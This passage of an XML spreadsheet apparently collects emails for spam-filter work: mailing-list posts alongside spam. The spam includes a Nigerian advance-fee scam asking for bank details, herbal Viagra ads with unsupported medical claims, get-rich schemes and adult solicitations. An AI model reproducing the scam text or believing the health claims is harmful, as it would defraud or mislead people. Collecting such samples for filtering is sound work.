 My computer is a lot faster than the last time I tried autosort (back in the 
 mid-90s); this is actually acceptable.
 Once I've confirmed that nothing actually breaks, I think I'll look into a few 
 more places that autosort needs to be called, because right now it only sorts 
 when you change to a folder, but if a new message arrives in the folder you're 
 looking at, it doesn't get sorted.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1233982810P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9QAhdK9b4h5R0IUIRArP5AJ9VlUsxOjQhik1UZuFl1Yyta0XMFgCgiZw4
 VdvKT009spZK/h2q6HJTqX8=
 =+Ns2
 -----END PGP SIGNATURE-----
 --==_Exmh_-1233982810P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">RAH quoted:
 &gt;Indians are not poor because there are too many of them; they are poor
 &gt;because there are too many regulations and too much government intervention
 &gt;-- even today, a decade after reforms were begun. India's greatest problems
 &gt;arise from a political culture guided by socialist instincts on the one
 &gt;hand and an imbedded legal obligation on the other hand.
 Nice theory and all, but s/India/France/g and the statements hold just
 as true, yet France is #12 in the UN's HDI ranking, not #124.
 &gt;Since all parties must stand for socialism, no party espouses
 &gt;classical liberalism
 I'm not convinced that that classical liberalism is a good solution
 for countries in real difficulty.  See Joseph Stiglitz (Nobel for
 Economics) on the FMI's failed remedies.  Of course googling on
 "Stiglitz FMI" only brings up links in Spanish and French.  I guess
 that variety of spin is non grata in many anglo circles.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Norton Systemworks 2002 Pro Edition               12399
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align=3D"center"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font size=3D"6" face=3D"Tahoma" color=3D"#000080"&gt;
 Norton SystemWorks 2002&lt;br&gt;Software Suite&lt;br&gt;
 Professional Edition&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;&lt;font color=3D"#FF0000"&gt;
 6 Feature-Packed Utilities,&lt;/font&gt; 1 Great Price&lt;/font&gt;&lt;br&gt;
 &lt;font size=3D"4"&gt;A $300.00+ Combined Retail Value for &lt;font color=3D"#FF00=
 00"&gt; Only $29.99!&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"3"&gt;&lt;span style=3D"background-color: #FFFF00"&gt;
 Protect your computer and your valuable information!&lt;br&gt;&lt;br&gt;
 Don't allow yourself to fall prey to destructive viruses!&lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;a href=3D"http://www.1800mailman.com/software/sw.htm"&gt;CLICK HERE FOR MORE=
  INFO AND TO ORDER&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"2"&gt;If you wish to unsubscribe from this list, please &lt;a href=
 =3D"http://www.1800mailman.com/removeme.html"&gt; Click Here&lt;/a&gt; to be remove=
 d.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great prices on laser toner cartridges for printers, copiers, and faxes .... Guaranteed
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BUSINESS ASSISTANCE
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Sir.
 First, I must solicit your confidence in this transaction, this is by virture of its nature as being utterly confidencial and top secret. all though i know that a transaction of this magnitude will make any one apprehensive and worried, but I am assuring you that all will be well at the end of the day.we have decided to contact you due to the urgency of this transaction, let me start by introducing myself properly to you.
 I am the Manager Bills and Exchange of Foreign Remittance Department of Union Bank of NIgeria (U.B.N. Headquarters Lagos Nigeria) formally Union Bank of Switzerland(UBS-AG Zurich Switzerland). In accordance with Federal Government Policies on indiginalization Law on company and Allied matters of Jan 1977. I am writing you this letter to ask for your support and co-operation to carry out this transaction.We discovered an abandoned sum of US$7. 5 million(Seven Million Five Hundred Thousand United States Dollars) in an account that belongs to one of our Foreign customer who died along side his entire family in November 1997 in a plane crash. Since this development, we have advertised for his next of kin or any close relation to come forward to claim this money, but nobody came to apply for the claim.To this effect, I and two other officials in my department, have decided to look for a trusted foreign partner who can stand in as the next of  kin to the deceased and claim this money.
 We need !a foreign partner to apply for the claim because of the fact that the customer was a foreigner and we don't want this money to go into the Banks Treasury as unclaimed fund. Every document to affect this process will emanate from my table and I will perfect every document to be in accordance with the banking law and guidelines, So you have nothing to worry about.We have agreed that 20% of the money will be for you, 10% for expenses incurred on both sides, 10% will be donated to the charity organization while 60% will be for my colleagues and I. 
 If you are going to help me, indicate by replying this letter and putting in your BANK PARTICULARS, PRIVATE TELEPHONE AND FAX NUMBERS.I await your immediate reply to enable us start this transaction in earnest.Once I receive your reply, I will send you the Text of application for immediate application of Claim.
 Yours faithfully,
 DR MARKUS PHILLIPS.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MSNBC: Rates Hit 18 year Low 4.75% ...26666
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT INFORMATION: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com. Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 38
 1201HVlI9-661PJwl15
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fuzzy Math
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000616
 Date: 2002-09-25T18:54:10-06:00
 One of the weirdest things I heard when listening to the Cato Institute debate 
 was an economist claim "a tenet of my profession is that people won't pay for 
 something they can get for free." Someone objected, using the analogy of 
 bottled water. There's a far better example: The New York Times.  
 Incredibly, this institution puts out pages and pages of high-quality 
 professional content each week and then distributes them by means of men in 
 trucks across the country overnight where they sit, waiting to be sold to 
 people. Meanwhile, the exact same content is available _for free_ using an 
 insidious peer-to-peer downloading system called "the Web" by typing in the 
 keyword "www.nytimes.com". Those people at the New York Times must not 
 understand the Internet or something! 
 More examples: the thriving shareware market, the Baen Free Library, Janis Ian 
 and others. 
 Other times, people claim that no one will create if they can't get paid. I'd 
 like to introduce you to free software and just about every weblog on the 
 planet.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: My brain hurts
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Someone tell me a joke, or email me a beer or something...
 A man is out driving in the country, and drives past a farm with the most
 beautiful pig -- fat, healthy, pink, clean, etc. Just a lovely pig. He gets
 out to admire the pig, and notices that it has a wooden leg! The farmer
 comes by and says "Howdie", and the passerby says "I was just stopping to
 admire your pig. What a lovely pig. But what's with the woo..." The farmer
 interrupts "Oh, yes, this is the most wonderful pig! When our house had a
 huge fire a few years back, and was burning down, this pig came in and
 squealed and made sure we all woke up and got out. She really saved our
 lives!" "My", says the passerby, "what a great story. But what's with the
 wooden l..?" The farmer jumps in again: "And then, when my youngest was out
 in the street playing just a few months ago, and a big tractor trailer came
 barrelling down on her, this pig jumped right in and pushed her out of the
 way, getting them both to the side of the road before the truck came by!"
 "I'll say, that does show great bravery," said the passerby. "But, if you
 don't mind my asking, what *is* the deal with the wooden leg?" The farmer
 paused. "Well," he said, "a pig like that -- you don't want to eat it all at
 once!"
 -- Sherry.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, Adam L. Beberg wrote:
 &gt; So far, but it's not even noon yet. Stealth patents are definately
 &gt; gaining in popularity, maybe we can get this included in the new death
 &gt; penalty for hackers law.
 Just ignore the laws completely. You cannot win the legal way, because the
 geek is a minority, and even not a lobby-toting minority at that. You
 Cannot Win That Way. Really.
 We need an uncensorable, hardened P2P infrastructure to distribute such
 staples as open source software.  Software patents are tragedy of the
 commons all over again. The collateral damage done by pirating is a
 complete footnote in comparison to the radioactive glass iron-fisted IP
 rights enforcement habitually produces.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: eBay, How To Secure Your Financial Future And Increase Your Income                     23827
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Would you like to earn&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;b&gt;&lt;font color=3D"#FF0000" size=3D"4" face=3D"Courier New"&gt;Would you li=
 ke to earn 
 $750 a day using &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Courier New"&gt;&lt;b&gt; &lt;i&gt;
 &lt;font size=3D"4" color=3D"#FF0000"&gt;e&lt;/font&gt;&lt;font size=3D"4"&gt;&lt;font color=3D=
 "#0000FF"&gt;B&lt;/font&gt;&lt;font color=3D"#FF00FF"&gt;a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" =
 color=3D"#008000"&gt;y&lt;/font&gt;&lt;/i&gt;&lt;font size=3D"4"&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"#FF0000" size=3D"4" face=3D"Courier Ne=
 w"&gt;and the 
 Internet?&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;You have received this e=
 mail for our free e-book
 &lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;&amp;quot;Secret$ of &lt;/font&gt; &lt;span s=
 tyle=3D"background-color: #FFFF00"&gt; &lt;i&gt;&lt;font size=3D"4" color=3D"#FF0000"&gt;=
 e&lt;/font&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000FF"&gt;B&lt;/font&gt;&lt;font color=3D"#F=
 F00FF"&gt;a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;y&lt;/font&gt;&lt;/i&gt;&lt;/spa=
 n&gt;&lt;font size=3D"4"&gt; &lt;font color=3D"#008000"&gt;
 PowerSeller$&amp;quot;&lt;/font&gt; because you expressed an interest in 
 making money with eBay and/or on the Internet.&lt;br&gt;
 &lt;br&gt;
 I absolutely - &lt;font color=3D"#0000FF"&gt;100% - Guarantee&lt;/font&gt; you have ne=
 ver 
 heard of this &lt;/font&gt; &lt;span style=3D"background-color: #FFFF00"&gt; &lt;i&gt;&lt;font =
 size=3D"4" color=3D"#FF0000"&gt;e&lt;/font&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000=
 FF"&gt;B&lt;/font&gt;&lt;font color=3D"#FF00FF"&gt;a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D=
 "#008000"&gt;y&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;font size=3D"4"&gt; 
 &amp;amp; Internet money-making system before.&lt;br&gt;
 &lt;br&gt;
 This &lt;i&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;/i&gt; no-strings attached e-book=
  &lt;/font&gt;
 &lt;font size=3D"4" color=3D"#008000"&gt;&amp;quot;Secrets of &lt;/font&gt; 
 &lt;span style=3D"background-color: #FFFF00"&gt; &lt;i&gt;&lt;font size=3D"4" color=3D"#F=
 F0000"&gt;e&lt;/font&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000FF"&gt;B&lt;/font&gt;&lt;font colo=
 r=3D"#FF00FF"&gt;a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;y&lt;/font&gt;&lt;/=
 i&gt;&lt;/span&gt;&lt;font size=3D"4"&gt;
 &lt;font color=3D"#008000"&gt;Powersellers&amp;quot;&lt;/font&gt; is so powerful, so 
 compelling it will blow your mind!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"4" color=3D"#008000" face=3D"Courier New"&gt;&lt;b&gt;
 C&lt;font color=3D"#008000"&gt;lick here to &lt;/font&gt;
 &lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;START YOUR JOU=
 RNEY!&lt;/a&gt; towards 
 financial freedom &lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Courier New"&gt;&lt;b&gt;&lt;font size=3D"4=
 "&gt;&lt;br&gt;
 &lt;br&gt;
 May 7th, 2002&lt;br&gt;
 &lt;br&gt;
 Mark W. Monday - &lt;/font&gt; &lt;i&gt;&lt;font size=3D"4"&gt;The &lt;/font&gt; &lt;/i&gt;&lt;span style=3D=
 "background-color: #FFFF00"&gt; &lt;i&gt;&lt;font size=3D"4" color=3D"#FF0000"&gt;e&lt;/font=
 &gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000FF"&gt;B&lt;/font&gt;&lt;font color=3D"#FF00FF"&gt;=
 a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;y&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;font=
  size=3D"4"&gt; &lt;i&gt;Millionaire&lt;/i&gt;&lt;br&gt;
 &lt;br&gt;
 In just a &lt;u&gt;few minutes&lt;/u&gt; reading my book, you &lt;font color=3D"#FF0000"&gt;=
 &lt;u&gt;will&lt;/u&gt;&lt;/font&gt; 
 find an opportunity so &lt;font color=3D"#FF0000"&gt;powerful&lt;/font&gt;, so
 &lt;font color=3D"#FF0000"&gt;compelling&lt;/font&gt;, that you'll wonder why someone =
 hasn't 
 thought of this sooner!&lt;br&gt;
 &lt;br&gt;
 This is &lt;u&gt;not a multi level marketing program&lt;/u&gt; or &amp;quot;Get rich quick=
  scheme&amp;quot;.&amp;nbsp; 
 It is a &lt;font color=3D"#0000FF"&gt;real business&lt;/font&gt; that can make you rea=
 lly
 &lt;font color=3D"#008000"&gt;&lt;u&gt;wealthy&lt;/u&gt;&lt;/font&gt;.&lt;br&gt;
 &lt;br&gt;
 You are about to &lt;font color=3D"#FF0000"&gt;journey&lt;/font&gt; to a wonderful pla=
 ce. A 
 place where &lt;font color=3D"#FF0000"&gt;freedom from a boss&lt;/font&gt;, making you=
 r own 
 rules and &lt;font color=3D"#FF0000"&gt;deciding your own destiny&lt;/font&gt; are par=
 amount. 
 A place that offers freedom with your time and a &lt;font color=3D"#FF0000"&gt;r=
 elief 
 from the 9 to 5 stress&lt;/font&gt; like you can't imagine!&lt;br&gt;
 &lt;br&gt;
 Imagine yourself waking up in the morning, turning on your computer and fi=
 nding 
 out that thousands of dollars had been deposited into your bank account. H=
 ow 
 would that make you feel?&amp;nbsp; It is 100% possible when you know the secr=
 ets to 
 making money using eBay and the Internet. &lt;br&gt;
 &lt;br&gt;
 If this idea turns you on, then so will this new e-Book &lt;/font&gt;
 &lt;font size=3D"4" color=3D"#008000"&gt;&amp;quot;Secrets of &lt;/font&gt; &lt;span style=3D=
 "background-color: #FFFF00"&gt; &lt;i&gt;&lt;font size=3D"4" color=3D"#FF0000"&gt;e&lt;/font=
 &gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000FF"&gt;B&lt;/font&gt;&lt;font color=3D"#FF00FF"&gt;=
 a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;y&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;font=
  size=3D"4"&gt; &lt;font color=3D"#008000"&gt;
 Powersellers&amp;quot;&lt;/font&gt;! Simply fill out the form located on our 
 website and you will receive via email this powerful money making e-book,
 &lt;font color=3D"#FF0000"&gt;absolutely FREE&lt;/font&gt; (You will &lt;i&gt;instantly&lt;/i&gt; =
 receive 
 your &lt;font color=3D"#FF0000"&gt;free&lt;/font&gt; e-book &amp;quot;Secrets of &lt;/font&gt;
 &lt;span style=3D"background-color: #FFFF00"&gt; &lt;i&gt;&lt;font size=3D"4" color=3D"#F=
 F0000"&gt;e&lt;/font&gt;&lt;font size=3D"4"&gt;&lt;font color=3D"#0000FF"&gt;B&lt;/font&gt;&lt;font colo=
 r=3D"#FF00FF"&gt;a&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"4" color=3D"#008000"&gt;y&lt;/font&gt;&lt;/=
 i&gt;&lt;/span&gt;&lt;font size=3D"4"&gt; Powersellers&amp;quot; 
 within a few seconds of placing your order).&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"4" color=3D"#008000" face=3D"Courier New"&gt;&lt;b&gt;
 C&lt;font color=3D"#008000"&gt;lick here to &lt;/font&gt;
 &lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;START YOUR JOU=
 RNEY!&lt;/a&gt; towards 
 financial freedom &lt;/b&gt;&lt;/font&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;&lt;b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;u&gt;&lt;font color=3D"#FF0000"&gt;FREE BONUS&lt;/font&gt;&lt;/u&gt; - Respond within the next=
  5 
 minutes and we'll give you our special report &amp;quot;The 5 Secrets to earni=
 ng $750 a 
 day using eBay and the Internet&amp;quot;.&lt;br&gt;
 &lt;br&gt;
 Everything we offered here is &lt;u&gt;&lt;font color=3D"#FF0000"&gt;free&lt;/font&gt;&lt;/u&gt;, =
 you have
 &lt;font color=3D"#008000"&gt;everything to gain&lt;/font&gt; and &lt;font color=3D"#0080=
 00"&gt;
 absolutely nothing to lose&lt;/font&gt; - so respond immediately and get started=
  on 
 the road to making really big money!&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;&lt;b&gt;Wouldn't it be nice to tell yo=
 ur boss you quit?&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;&lt;b&gt;Spend more time with your chil=
 dren and family members?&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;&lt;b&gt;Stop dreaming about financial =
 freedom.&amp;nbsp; &lt;/b&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;&lt;b&gt;Make it happen!&amp;nbsp; &lt;/b&gt;&lt;/fo=
 nt&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font color=3D"#008000" size=3D"4" face=3D"Courier New"&gt;We can help!=
 &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size=3D"4" color=3D"#008000" face=3D"Courier New"&gt;&lt;b&gt;VISIT THE SI=
 TE IMMEDIATELY TO BEGIN THIS 
 AMAZING JOURNEY INTO FINANCIAL INDEPENDENCE!&amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New"&gt;&lt;font size=3D"4" color=3D"#008000"&gt;&lt;b&gt;
 C&lt;font color=3D"#008000"&gt;lick here to &lt;/font&gt;
 &lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;START YOUR JOU=
 RNEY!&lt;/a&gt; towards 
 financial freedom &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;
 &lt;font size=3D"4" face=3D"Courier New"&gt;
 http://www.2002marketing.com/auction/index.html&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New"&gt;&lt;b&gt;
 &lt;font size=3D"4"&gt;
 &lt;br&gt;
 Sincerely,&lt;br&gt;
 &lt;br&gt;
 Mark W. Monday&lt;br&gt;
 The eBay Millionaire&lt;br&gt;
 &lt;/font&gt;
 &lt;/b&gt;&lt;font size=3D"4"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;font size=3D"4" color=3D"#008000"&gt;&lt;b&gt;
 C&lt;font color=3D"#008000"&gt;lick here to &lt;/font&gt;
 &lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;START YOUR JOU=
 RNEY!&lt;/a&gt; towards 
 financial freedom&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.2002marketing.com/auction/index.html"&gt;
 &lt;font size=3D"4" face=3D"Courier New"&gt;
 http://www.2002marketing.com/auction/index.html&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Courier New" size=3D"4"&gt;NOTICE: Your 
 email address was obtained from an opt-in list, &lt;strong style=3D"font-weig=
 ht: 400"&gt;
 Reference # 10023387&lt;/strong&gt;.&amp;nbsp; If you wish to unsubscribe from this =
 list, 
 please &lt;a href=3D"mailto:Affiliate1@btamail.net.cn?subject=3DRemove_Me_eBa=
 y_Secrets"&gt;Click Here&lt;/a&gt; and send from this e-mail address.&amp;nbsp;&amp;nbsp; I=
 f you have 
 previously unsubscribed and are still receiving this message, you may emai=
 l 
 our&amp;nbsp;Abuse Control Center at
 &lt;a href=3D"mailto:Affiliate1@btamail.net.cn?subject=3DRemove_Me_eBay_Secre=
 ts"&gt;Abuse Report&lt;/a&gt;.&lt;br&gt;
 &lt;br&gt;
 You received this email because you have expressed an interest in making m=
 oney 
 with eBay and or on the Internet.
 &lt;a href=3D"mailto:Affiliate1@btamail.net.cn?subject=3DRemove_Me_eBay_Secre=
 ts"&gt;Click 
 here&lt;/a&gt; if you would like to be removed from future information.&amp;nbsp; Do=
  not 
 hit reply.&amp;nbsp; Click the CLICK HERE and hit send to be instantly removed=
 .&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Erections O-plenty, Herbal Viagra
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &amp;nbsp;
 &lt;table BORDER=0 WIDTH="650" BGCOLOR="#FFFFFF" &gt;
 &lt;tr&gt;
 &lt;td HEIGHT="20"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=RIGHT&gt;&lt;!-- main frame --&gt;
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td WIDTH="450"&gt;&lt;!-- page frame --&gt;
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="440" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;&lt;font color="#3333FF"&gt;Herbal Alternative
 for Erectile Dysfunction&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&lt;b&gt;Men of Iron&lt;/b&gt; has been featured on
 over 100 TV News and Top Radio stations across America, and we know why...&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;It REALLY works!&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;&lt;a href="http://66.231.133.202/menofiron/"&gt;Visit Our Web Site Click
 Here:&amp;nbsp; Learn about our special offer!&lt;/a&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=0 COLS=1 WIDTH="440" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial,Helvetica"&gt;Men Of Iron Benefits:&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Number 1 formula for men&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Dramatically Enhances Organism&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; No Negative Side Effects (All Natural
 Ingredients).&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Boosts Multiple Orgasms!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Does Not Increase Blood Pressure!&amp;nbsp;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Increases circulation in men so erections
 become firmer.&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Helps sexual response dysfunction or
 lack of interest in sex.&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Clears impotency problems.&amp;nbsp;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Boosts Multiple Climaxes.&amp;nbsp;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Relieves Emotional Ups Downs, and Headaches!&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Helps Relieve Prostate Problems.&amp;nbsp;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Lowers Cholesterol.&amp;nbsp;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial,Helvetica"&gt;&amp;#8226; Very Affordable Price&lt;/font&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;a href="http://66.231.133.202/menofiron/"&gt;Visit Our Web Site Click
 Here:&amp;nbsp; Learn about our special offer!&lt;/a&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- page frame --&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- main frame --&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dirty Knickers n Lollipops
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Kates Knickers&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p ALIGN="CENTER"&gt;&lt;a href="http://www.geocities.com/katesknickers/myknickers.html"&gt;&lt;FONT SIZE="6"&gt;
 Click Here Only If You Are Over 18 Years Old&lt;/FONT&gt; &lt;/a&gt; 
 &lt;p ALIGN="CENTER"&gt;&lt;a href="http://www.geocities.com/katesknickers/remove.html"&gt;&lt;FONT SIZE="2"&gt;
 Click Here If you wish to be removed from future mailings&lt;/FONT&gt; &lt;/a&gt; 
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] unsubscribe
</t>
  </si>
  <si>
    <t xml:space="preserve">ignore
 ----- Original Message -----
 From: "Christopher VanOosterhout" &lt;chris@torresen.com&gt;
 To: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Thursday, July 25, 2002 7:51 AM
 Subject: [Razor-users] unsubscribe
 &gt; unsubscribe
 &gt;
 &gt; At 09:13 PM 7/24/02 -0800, John Andersen wrote:
 &gt; &gt;On Wednesday 24 July 2002 08:42 am, rODbegbie wrote:
 &gt; &gt; &gt; rODbegbie wrote:
 &gt; &gt; &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
 &gt; &gt; &gt; &gt; mislead users into downloading the dev code in order to get more
 &gt; &gt; &gt; &gt; unwitting test sites.
 &gt; &gt; &gt;
 &gt; &gt; &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher
 than I
 &gt; &gt; &gt; intended.
 &gt; &gt; &gt;
 &gt; &gt; &gt; As the old maxim goes, "Never ascribe to malice that which can be
 equally
